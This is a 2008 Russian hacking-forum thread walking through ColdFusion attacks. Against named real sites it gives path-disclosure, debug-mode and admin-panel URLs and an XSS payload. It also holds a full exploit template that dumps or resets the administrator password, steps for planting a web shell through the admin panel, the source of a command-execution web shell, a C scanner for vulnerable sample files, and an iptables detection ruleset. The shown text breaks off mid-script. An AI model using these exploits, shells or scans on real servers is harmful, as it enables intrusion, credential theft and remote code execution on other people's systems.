Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
[ Обзор уязвимостей CFM(Cold-Fusion) ] |
27.05.2008, 14:44
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
[ Обзор уязвимостей CFM(Cold-Fusion) ]
Расскрытие пути
Запрашиваем у сервера, работающего под IIS, файл, состоящий из имени MS-DOS-устройства (nul, prn, aux, lpt1) и окончания .dbm
Example:
http://www.zogby.com/nul.dbm
Доступ к отладочной информации
Дописываем к скрипту ?mode=debug
Example:
http://www.zogby.com/News/ReadNews.dbm?mode=debug
Доступ к админке
Если админ не отключил доступ к ColdFusion Administrator с IP-адресов отличающихся от 127.0.0.1, то можно получить доступ к авторизации, ввести надо только лишь пароль.
Example:
http://www.zogby.com/CFIDE/administrator/index.cfm
Расскрытие инсталяционного пути в Macromedia ColdFusion MX
Запрашиваем /CFIDE/probe.cfm на 8500 порту
Example:
http://www.site.com:8500/CFIDE/probe.cfm
XSS в Coldfusion Fusebox
index.cfm?fuseaction=XSS
Example:
http://www.proinno-europe.eu/index.cfm?fuseaction="><script>alert('Antichat')</script>
Раскрытие пароля администратора
Уязвимость обнаружена в ColdFusion MX. Удаленный авторизованный пользователь способный создавать ColdFusion шаблоны может получить пароль администратора. Удаленный авторизованный пользователь с привилегиями создавать шаблоны, которые содержат тэги CreateObject и cfobject, может создать шаблон, чтобы получить доступ к паролю администратора.
Example:
PHP код:
<cfscript>
objFileWriter = CreateObject("java","java.io.FileWriter");
objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");
objJavaC = CreateObject("java","sun.tools.javac.Main");
objString = CreateObject("java","java.lang.String");
objFile = CreateObject("java","java.io.File");
if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }
strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";
strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";
strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";
strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";
fileWriter = objFileWriter.init("#strJavaSource#",false);
fileWriter.write("import coldfusion.security.SecurityManager;");
fileWriter.write("import java.io.File;");
fileWriter.write("public class SecurityExploit extends SecurityManager {");
fileWriter.write("public SecurityExploit(File arg0, File arg1) {");
fileWriter.write("super(arg0, arg1); }");
fileWriter.write("public boolean isAdminSecurityEnabled(){");
fileWriter.write("return false;}}");
fileWriter.flush();
fileWriter.close();
str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");
strArr = str.split(",");
byteArray = objByteArray.init();
compileObj =objJavaC.init(byteArray,str);
compileObj.compile(strArr);
obj = CreateObject("java","SecurityExploit");
file1 = objFile.init("#strNeoSecFile#");
file2 = objFile.init("#strPasswdFile#");
obj.init(file1,file2);
obj.load();
</cfscript>
<cfscript>
// Get Administrator Password
strAdminPw = obj.getAdminPassword();
// Set Administrator Password
//obj.setAdminPassword("test123");
// Turn off Sandbox Security
//obj.setSandboxSecurityEnabled(false);
// Turn off Administrator Login
//obj.setAdminSecurityEnabled(false);
// Turn off RDS Login
//obj.setRdsSecurityEnabled(false);
// Set RDS Password
//obj.setRdsPassword("test123");
// Turn off JVM Security
//obj.setJvmSecurityEnabled(false);
</cfscript>
<cfoutput>Adminstrator Password: #strAdminPw#
</cfoutput>
Заливка шелла из админки
I.
Если на сервере стоит IIS, то заходим на вкладку Server -> Server Settings-> Settings, в Error Template устанавливаем ссылку на шелл, после чего вызываем несуществующую страницу на сервере и он запустится.
II.
Переходим на вкладку Server ->Automated Tasks-> Schedule Task, нажимаем Add Scheduled Task и вводим имя задачи. Поле Operation должно иметь значение HTTPRequest. В поле URL пишем ссылку на шелл, затем в поле Publish ставим галочку Save output to a file. Указываем путь и имя выходного файла на сервере.
Шелл:
PHP код:
< html>
< body>
< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
< tr>
< td>Command:</td>
< td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td>
</tr>
< tr>
< td>Options:</td>
< td> < input type=text name="opts" size=50 < cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
</tr>
< tr>
< td>Timeout:</td>
< td>< input type=text name="timeout" size=4 < cfif isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5" </cfif> > </td>
</tr>
</table>
< input type=submit value="Exec" >
</FORM>
< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
< pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>
Буду постепенно добавлять уязвимости в обзор, благо их много 
|
|
|
27.05.2008, 14:51
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Локальный инклуд
Macromedia ColdFusion поставляется с несколькими небольшими "вспомогательными" приложениями, которые, как предполагается, обучают пользователей работать с ColdFusion. Эти приложения не установлены по умолчанию, и Macromedia рекомендует не устанавливать их на рабочий сервер. Некоторые содержат уязвимость, позволяющую нападавшему создавать файлы или выполнять команды на уязвимом сервере.
Интересные места
/cd/../config/html/cnf_gi.htm
/cfappman/index.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expelvel/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expressions.cfm
/cfdocs/MOLE.CFM
/cfdocs/root.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/setlocale.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/TOXIC.CFM
/cfdocs/zero.cfm
/CFIDE/Administrator/startstop.html
/cfide/Administrator/startstop.html
/cfmlsyntaxcheck.cfm
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
Сканеры:
PHP код:
/* CrAzY ScAn by Asmbeginer.com */
/* cc -o crazy crazy.c */
/* ./crazy 127.0.0.1 */
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char buffer[1024];
int count=0;
int ntcheck;
char ntbuff[1024];
char *buff[140];
buff[1] = "GET /cfdocs/zero.cfm HTTP/1.0\n\n";
buff[2] = "GET /cfdocs/root.cfm HTTP/1.0\n\n";
buff[3] = "GET /cfdocs/expressions.cfm HTTP/1.0\n\n";
buff[4] = "GET /cfdocs/TOXIC.CFM HTTP/1.0\n\n";
buff[5] = "GET /cfdocs/MOLE.CFM HTTP/1.0\n\n";
buff[6] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n";
buff[7] = "GET /cfdocs/expeval/sendmail.cfm HTTP/1.0\n\n";
buff[8] = "GET /cfdocs/expeval/eval.cfm HTTP/1.0\n\n";
buff[9] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
buff[10] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n";
buff[11] = "GET /cfdocs/exampleapp/publish/admin/addcontent.cfm
HTTP/1.0\n\n";
buff[12] = "GET
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini HTTP/1.0\n\n";
buff[13] = "GET /cfdocs/exampleapp/publish/admin/application.cfm
HTTP/1.0\n\n";
buff[14] = "GET /cfdocs/exampleapp/email/application.cfm HTTP/1.0\n\n";
buff[15] = "GET /cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0\n\n";
buff[16] = "GET /cfdocs/examples/parks/detail.cfm HTTP/1.0\n\n";
buff[17] = "GET /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\n\n";
buff[18] = "GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\n\n";
buff[19] = "GET /cfdocs/snippets/viewexample.cfm HTTP/1.0\n\n";
buff[20] = "GET /cfdocs/snippets/gettempdirectory.cfm HTTP/1.0\n\n";
buff[21] = "GET /cfdocs/snippets/fileexists.cfm HTTP/1.0\n\n";
buff[22] = "GET /cfdocs/snippets/evaluate.cfm HTTP/1.0\n\n";
buff[23] = "GET /cfappman/index.cfm HTTP/1.0\n\n";
buff[24] = "GET /cfusion/cfapps/forums/forums_.mdb HTTP/1.0\n\n";
buff[25] = "GET /cfusion/cfapps/security/realm_.mdb HTTP/1.0\n\n";
buff[26] = "GET /cfusion/cfapps/forums/data/forums.mdb HTTP/1.0\n\n";
buff[27] = "GET /cfusion/cfapps/security/data/realm.mdb HTTP/1.0\n\n";
buff[28] = "GET /cfusion/database/cfexamples.mdb HTTP/1.0\n\n";
buff[29] = "GET /cfusion/database/cfsnippets.mdb HTTP/1.0\n\n";
buff[30] = "GET /cfusion/database/smpolicy.mdb HTTP/1.0\n\n";
buff[31] = "GET /cfusion/database/cypress.mdb HTTP/1.0\n\n";
buff[32] = "GET /DataBase/ HTTP/1.0\n\n";
buff[33] = "GET /database.nsf/e1466a8590/6048076233?OpenDocument
HTTP/1.0\n\n";
buff[34] = "GET /database.nsf/e146fa8590/6148076233?EditDocument
HTTP/1.0\n\n";
buff[35] = "GET /database.nsf/e146fa8590/6148076233?DeleteDocument
HTTP/1.0\n\n";
buff[36] = "GET /domcfg.nsf/?open HTTP/1.0\n\n";
buff[37] = "GET /domcfg.nsf/URLRedirect/?OpenForm. HTTP/1.0\n\n";
buff[38] = "GET /domcfg.nsf/ HTTP/1.0\n\n";
buff[39] = "GET /domlog.nsf/ HTTP/1.0\n\n";
buff[40] = "GET /log.nsf/ HTTP/1.0\n\n";
buff[41] = "GET /catalog.nsf/ HTTP/1.0\n\n";
buff[42] = "GET /names.nsf/ HTTP/1.0\n\n";
buff[43] = "GET /database.nsf/ HTTP/1.0\n\n";
buff[44] = "GET /today.nsf/ HTTP/1.0\n\n";
buff[45] = "GET /cgi-bin/cgi-lib.pl HTTP/1.0\n\n";
buff[46] = "GET /cgi-bin/imagemap.c HTTP/1.0\n\n";
buff[47] = "GET /cgi-bin/imagemap.exe HTTP/1.0\n\n";
buff[48] = "GET /cgi-bin/minimal.exe HTTP/1.0\n\n";
buff[49] = "GET /cgi-bin/redir.exe HTTP/1.0\n\n";
buff[50] = "GET /cgi-bin/stats.prg HTTP/1.0\n\n";
buff[51] = "GET /cgi-bin/statsconfig HTTP/1.0\n\n";
buff[52] = "GET /cgi-bin/visadmin.exe HTTP/1.0\n\n";
buff[53] = "GET /cgi-bin/visitor.exe HTTP/1.0\n\n";
buff[54] = "GET /cgi-bin/htmldocs HTTP/1.0\n\n";
buff[55] = "GET /cgi-bin/logs HTTP/1.0\n\n";
buff[56] = "GET /scripts/ HTTP/1.0\n\n";
buff[57] = "GET /Default.asp HTTP/1.0\n\n";
buff[58] = "GET /_vti_bin HTTP/1.0\n\n";
buff[59] = "GET /_vti_bin/_vti_adm HTTP/1.0\n\n";
buff[60] = "GET /_vti_bin/_vti_aut HTTP/1.0\n\n";
buff[61] = "GET /srchadm HTTP/1.0\n\n";
buff[62] = "GET /iisadmin HTTP/1.0\n\n";
buff[63] = "GET /_AuthChangeUrl? HTTP/1.0\n\n";
buff[64] = "GET /_vti_inf.html HTTP/1.0\n\n";
buff[65] = "GET /?PageServices HTTP/1.0\n\n";
buff[66] = "GET /html/?PageServices HTTP/1.0\n\n";
buff[67] = "GET /scripts/cpshost.dll HTTP/1.0\n\n";
buff[68] = "GET /scripts/uploadn.asp HTTP/1.0\n\n";
buff[69] = "GET /scripts/uploadx.asp HTTP/1.0\n\n";
buff[70] = "GET /scripts/upload.asp HTTP/1.0\n\n";
buff[71] = "GET /scripts/repost.asp HTTP/1.0\n\n";
buff[72] = "GET /scripts/postinfo.asp HTTP/1.0\n\n";
buff[73] = "GET /scripts/run.exe HTTP/1.0\n\n";
buff[74] = "GET /scripts/iisadmin/bdir.htr HTTP/1.0\n\n";
buff[75] = "GET /scripts/iisadmin/samples/ctgestb.htx HTTP/1.0\n\n";
buff[76] = "GET /scripts/iisadmin/samples/ctgestb.idc HTTP/1.0\n\n";
buff[77] = "GET /scripts/iisadmin/samples/details.htx HTTP/1.0\n\n";
buff[78] = "GET /scripts/iisadmin/samples/details.idc HTTP/1.0\n\n";
buff[79] = "GET /scripts/iisadmin/samples/query.htx HTTP/1.0\n\n";
buff[80] = "GET /scripts/iisadmin/samples/query.idc HTTP/1.0\n\n";
buff[81] = "GET /scripts/iisadmin/samples/register.htx HTTP/1.0\n\n";
buff[82] = "GET /scripts/iisadmin/samples/register.idc HTTP/1.0\n\n";
buff[83] = "GET /scripts/iisadmin/samples/sample.htx HTTP/1.0\n\n";
buff[84] = "GET /scripts/iisadmin/samples/sample.idc HTTP/1.0\n\n";
buff[85] = "GET /scripts/iisadmin/samples/sample2.htx HTTP/1.0\n\n";
buff[86] = "GET /scripts/iisadmin/samples/viewbook.htx HTTP/1.0\n\n";
buff[87] = "GET /scripts/iisadmin/samples/viewbook.idc HTTP/1.0\n\n";
buff[88] = "GET /scripts/iisadmin/tools/ct.htx HTTP/1.0\n\n";
buff[89] = "GET /scripts/iisadmin/tools/ctss.idc HTTP/1.0\n\n";
buff[90] = "GET /scripts/iisadmin/tools/dsnform.exe HTTP/1.0\n\n";
buff[91] = "GET /scripts/iisadmin/tools/getdrvrs.exe HTTP/1.0\n\n";
buff[92] = "GET /scripts/iisadmin/tools/mkilog.exe HTTP/1.0\n\n";
buff[93] = "GET /scripts/iisadmin/tools/newdsn.exe HTTP/1.0\n\n";
buff[94] = "GET /IISADMPWD/achg.htr HTTP/1.0\n\n";
buff[95] = "GET /IISADMPWD/aexp.htr HTTP/1.0\n\n";
buff[96] = "GET /IISADMPWD/aexp2.htr HTTP/1.0\n\n";
buff[97] = "GET /IISADMPWD/aexp2b.htr HTTP/1.0\n\n";
buff[98] = "GET /IISADMPWD/aexp3.htr HTTP/1.0\n\n";
buff[99] = "GET /IISADMPWD/aexp4.htr HTTP/1.0\n\n";
buff[100] = "GET /IISADMPWD/aexp4b.htr HTTP/1.0\n\n";
buff[101] = "GET /IISADMPWD/anot.htr HTTP/1.0\n\n";
buff[102] = "GET /IISADMPWD/anot3.htr HTTP/1.0\n\n";
buff[103] = "GET /_vti_pvt/writeto.cnf HTTP/1.0\n\n";
buff[104] = "GET /_vti_pvt/svcacl.cnf HTTP/1.0\n\n";
buff[105] = "GET /_vti_pvt/services.cnf HTTP/1.0\n\n";
buff[106] = "GET /_vti_pvt/service.stp HTTP/1.0\n\n";
buff[107] = "GET /_vti_pvt/service.cnf HTTP/1.0\n\n";
buff[108] = "GET /_vti_pvt/access.cnf HTTP/1.0\n\n";
buff[109] = "GET /_private/registrations.txt HTTP/1.0\n\n";
buff[110] = "GET /_private/registrations.htm HTTP/1.0\n\n";
buff[111] = "GET /_private/register.txt HTTP/1.0\n\n";
buff[112] = "GET /_private/register.htm HTTP/1.0\n\n";
buff[113] = "GET /_private/orders.txt HTTP/1.0\n\n";
buff[114] = "GET /_private/orders.htm HTTP/1.0\n\n";
buff[115] = "GET /_private/form_results.htm HTTP/1.0\n\n";
buff[116] = "GET /_private/form_results.txt HTTP/1.0\n\n";
buff[117] = "GET /admisapi/fpadmin.htm HTTP/1.0\n\n";
buff[118] = "GET /scripts/Fpadmcgi.exe HTTP/1.0\n\n";
buff[119] = "GET /_vti_bin/shtml.dll HTTP/1.0\n\n";
buff[120] = "GET /_vti_bin/_vti_aut/author.dll HTTP/1.0\n\n";
buff[121] = "GET /_vti_bin/_vti_adm/admin.dll HTTP/1.0\n\n";
buff[122] = "GET /msads/Samples/selector/showcode.asp HTTP/1.0\n\n";
buff[123] = "GET /scripts/perl? HTTP/1.0\n\n";
buff[124] = "GET /scripts/proxy/w3proxy.dll HTTP/1.0\n\n";
buff[125] = "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n";
buff[126] = "GET /iissamples/exair/howitworks/codebrws.asp
HTTP/1.0\n\n";
buff[127] = "GET /scripts/CGImail.exe HTTP/1.0\n\n";
buff[128] = "GET /AdvWorks/equipment/catalog_type.asp HTTP/1.0\n\n";
buff[129] = "GET /scripts/iisadmin/default.htm HTTP/1.0\n\n";
buff[130] = "GET /msadc/samples/adctest.asp HTTP/1.0\n\n";
buff[131] = "GET /msadc/msadcs.dll HTTP/1.0\n\n";
buff[132] = "GET /adsamples/config/site.csc HTTP/1.0\n\n";
buff[133] = "GET /scripts/../../cmd.exe HTTP/1.0\n\n";
buff[134] = "GET /scripts/cpshost.dll HTTP/1.0\n\n";
buff[135] = "GET /scripts/convert.bas HTTP/1.0\n\n";
buff[136] = "GET .html/...... HTTP/1.0\n\n";
buff[137] = "GET /publisher/ HTTP/1.0\n\n";
buff[138] = "GET ..../Windows/Admin.pwl HTTP/1.0\n\n";
buff[139] = "GET ....../......ida/con HTTP/1.0\n\n";
if (argc>2)
{
printf("\nusage : %s host ",argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
while(count++ < 140)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
for(ntcheck=0; ntcheck < 1024; ntcheck++)
{
ntbuff[ntcheck] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
recv(sock,ntbuff, sizeof(ntbuff),0);
close(sock);
}
}
|
|
|
|
27.05.2008, 14:54
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
PHP код:
#!/bin/bash
#Copyright 2003 William Stearns <wstearns@pobox.com>
#Released under the GPL.
#ZZZZ Check Me and MyVersion
Me='snort-web-coldfusion'
MyVersion='20031125'
#DefaultActions=''
[ -r /etc/firebricks/firebricks.conf ] && . /etc/firebricks/firebricks.conf
[ -r /etc/firebricks/$Me.conf ] && . /etc/firebricks/$Me.conf
[ -r ${FBLibDir:-'/usr/lib/firebricks/'}/firebrickslib ] && . ${FBLibDir:-'/usr/lib/firebricks/'}/firebrickslib
if [ -z "$FBLibVer" ]; then
echo 'It looks like firebrickslib was not loaded, why? Exiting' >&2
exit 1
fi
for OneTask in $Tasks ; do
case "$OneTask" in
link)
$IptablesBin -N $Me >/dev/null 2>&1
#ZZZZ try to restrict the following three to only send down what the chain needs to inspect.
$IptablesBin $AppIn INPUT -i \! lo -j $Me
$IptablesBin $AppIn FORWARD -j $Me
$IptablesBin $AppIn OUTPUT -j $Me
;;
unlink)
#ZZZZ Make the same changes as above (such as "-p tcp"), but if you cut and paste, note "$AppIn" is now "-D"
$IptablesBin -D INPUT -i \! lo -j $Me
$IptablesBin -D FORWARD -j $Me
$IptablesBin -D OUTPUT -j $Me
$IptablesBin -X $Me >/dev/null 2>&1
;;
create)
echo "Starting $Me" >&2
FlushOrNewChain $Me
LogAs="SID903" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfcache.map"' $Tail # '"WEB-COLDFUSION cfcache.map access"' nocase-ignored bugtraq,917 cve,CVE-2000-0057 classtype:attempted-recon sid:903
LogAs="SID904" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/email/application.cfm"' $Tail # '"WEB-COLDFUSION exampleapp application.cfm"' nocase-ignored bugtraq,1021 classtype:attempted-recon sid:904
LogAs="SID905" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/publish/admin/application.cfm"' $Tail # '"WEB-COLDFUSION application.cfm access"' nocase-ignored bugtraq,1021 classtype:attempted-recon sid:905
LogAs="SID906" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/email/getfile.cfm"' $Tail # '"WEB-COLDFUSION getfile.cfm access"' nocase-ignored bugtraq,229 classtype:attempted-recon sid:906
LogAs="SID907" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/publish/admin/addcontent.cfm"' $Tail # '"WEB-COLDFUSION addcontent.cfm access"' nocase-ignored classtype:attempted-recon sid:907
LogAs="SID908" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfide/administrator/index.cfm"' $Tail # '"WEB-COLDFUSION administrator access"' nocase-ignored cve,CVE-2000-0538 classtype:attempted-recon sid:908
LogAs="SID909" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_SETDATASOURCEUSERNAME()"' $Tail # '"WEB-COLDFUSION datasource username attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:909
LogAs="SID910" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/fileexists.cfm"' $Tail # '"WEB-COLDFUSION fileexists.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:910
LogAs="SID911" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/exprcalc.cfm"' $Tail # '"WEB-COLDFUSION exprcalc access"' nocase-ignored cve,CVE-1999-0455 bugtraq,550 classtype:attempted-recon sid:911
LogAs="SID912" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/parks/detail.cfm"' $Tail # '"WEB-COLDFUSION parks access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:912
LogAs="SID913" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfappman/index.cfm"' $Tail # '"WEB-COLDFUSION cfappman access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:913
LogAs="SID914" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/cvbeans/beaninfo.cfm"' $Tail # '"WEB-COLDFUSION beaninfo access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:914
LogAs="SID915" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/evaluate.cfm"' $Tail # '"WEB-COLDFUSION evaluate.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:915
LogAs="SID916" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_GETODBCDSN()"' $Tail # '"WEB-COLDFUSION getodbcdsn access"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:916
LogAs="SID917" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_DBCONNECTIONS_FLUSH()"' $Tail # '"WEB-COLDFUSION db connections flush attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:917
LogAs="SID918" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/"' $Tail # '"WEB-COLDFUSION expeval access"' nocase-ignored bugtraq,550 cve,CAN-1999-0477 classtype:attempted-user sid:918
LogAs="SID919" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_SETDATASOURCEPASSWORD()"' $Tail # '"WEB-COLDFUSION datasource passwordattempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:919
LogAs="SID920" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_ISCOLDFUSIONDATASOURCE()"' $Tail # '"WEB-COLDFUSION datasource attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:920
LogAs="SID921" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_ENCRYPT()"' $Tail # '"WEB-COLDFUSION admin encrypt attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:921
LogAs="SID922" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/displayopenedfile.cfm"' $Tail # '"WEB-COLDFUSION displayfile access"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:922
LogAs="SID923" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_GETODBCINI()"' $Tail # '"WEB-COLDFUSION getodbcin attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:923
LogAs="SID924" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_DECRYPT()"' $Tail # '"WEB-COLDFUSION admin decrypt attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:924
LogAs="SID925" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/mainframeset.cfm"' $Tail # '"WEB-COLDFUSION mainframeset access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:925
LogAs="SID926" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_SETODBCINI()"' $Tail # '"WEB-COLDFUSION set odbc ini attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:926
LogAs="SID927" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_SETTINGS_REFRESH()"' $Tail # '"WEB-COLDFUSION settings refresh attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:927
LogAs="SID928" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/"' $Tail # '"WEB-COLDFUSION exampleapp access"' nocase-ignored classtype:attempted-recon sid:928
LogAs="SID929" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_VERIFYMAIL()"' $Tail # '"WEB-COLDFUSION CFUSION_VERIFYMAIL access"' nocase-ignored bugtraq,550 classtype:attempted-user sid:929
LogAs="SID930" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/"' $Tail # '"WEB-COLDFUSION snippets attempt"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:930
LogAs="SID931" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/cfmlsyntaxcheck.cfm"' $Tail # '"WEB-COLDFUSION cfmlsyntaxcheck.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:931
LogAs="SID932" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/application.cfm"' $Tail # '"WEB-COLDFUSION application.cfm access"' nocase-ignored bugtraq,550 arachnids,268 cve,CAN-2000-0189 classtype:attempted-recon sid:932
LogAs="SID933" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/onrequestend.cfm"' $Tail # '"WEB-COLDFUSION onrequestend.cfm access"' nocase-ignored bugtraq,550 arachnids,269 cve,CAN-2000-0189 classtype:attempted-recon sid:933
LogAs="SID935" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfide/administrator/startstop.html"' $Tail # '"WEB-COLDFUSION startstop DOS access"' nocase-ignored bugtraq,247 classtype:web-application-attack sid:935
LogAs="SID936" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/gettempdirectory.cfm"' $Tail # '"WEB-COLDFUSION gettempdirectory.cfm access "' nocase-ignored bugtraq,550 classtype:attempted-recon sid:936
LogAs="SID1659" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/sendmail.cfm"' $Tail # '"WEB-COLDFUSION sendmail.cfm access"' nocase-ignored classtype:attempted-recon sid:1659
LogAs="SID1540" $Ipt -A $Me -p tcp --dport 80 -m string --string '"Mode=debug"' $Tail # '"WEB-COLDFUSION ?Mode=debug attempt"' nocase-ignored classtype:web-application-activity sid:1540
;;
destroy)
echo "Stopping $Me" >&2
DestroyChain $Me
;;
renamechain)
TempChain="$Me-$RANDOM"
echo "Replacing existing rules in $Me with new rules" >&2
$IptablesBin -E $Me $TempChain
;;
replacelinks)
if [ -z "$TempChain" ]; then
echo "No temporary chain to relink in $Me replacelinks, replace operation incomplete." >&2
elif ! $IptablesBin -L $Me -n >/dev/null 2>&1 ; then
echo "No $Me chain in $Me, replace operation incomplete." >&2
